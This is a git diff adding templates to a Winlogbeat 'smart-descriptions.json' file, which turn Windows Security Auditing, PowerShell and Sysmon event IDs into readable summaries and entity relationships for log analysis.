diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index eb6a595a2..1d8547db9 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -1,34 +1,1631 @@ [ { - "value": "Auditing event on {winlog.computer_name}: {event.action}", + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + 
"type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": 
"action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special 
privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. 
It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": 
"winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled 
local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a 
service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} 
successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} 
from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + }, + { + "field": "host.hostname" + } + ] + 
}, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + 
"target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": 
"accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to 
{action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 4106 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + 
"target": "process.command_line", + "type": "executed" }, { - "field": "winlog.computer_name" + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" }, { - "field": "event.action" + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" } ] }, { - "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 1 }, { - "field": "winlog.computer_name" + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" }, { - "field": "winlog.SubjectUserSid" + "field": "process.executable" }, { - "field": "event.action" + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": 
"executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": 
"process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + 
"field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" } ] }, @@ -43,9 +1640,6 @@ "field": "event.action", "value": "Filtering Platform Connection" }, - { - "field": "winlog.computer_name" - }, { "field": "winlog.event_data.SourceAddress" }, 
@@ -55,59 +1649,83 @@ ] }, { - "value": "Service Control Manager on {host.hostname}: {event.original}", + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "host.hostname" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "event.original" + "field": "winlog.event_data.SourceAddress" } ] }, { - "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.opcode" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "winlog.computer_name" + "field": "winlog.event_data.DestAddress" } ] }, { - "value": "Sysmon : no event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{00000000-0000-0000-0000-000000000000}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.computer_name" + "field": "event.action", + "value": "Filtering Platform Connection" } ] }, { - "value": "Security event : {event.action} on {winlog.computer_name}", + "value": "Service Control Manager on 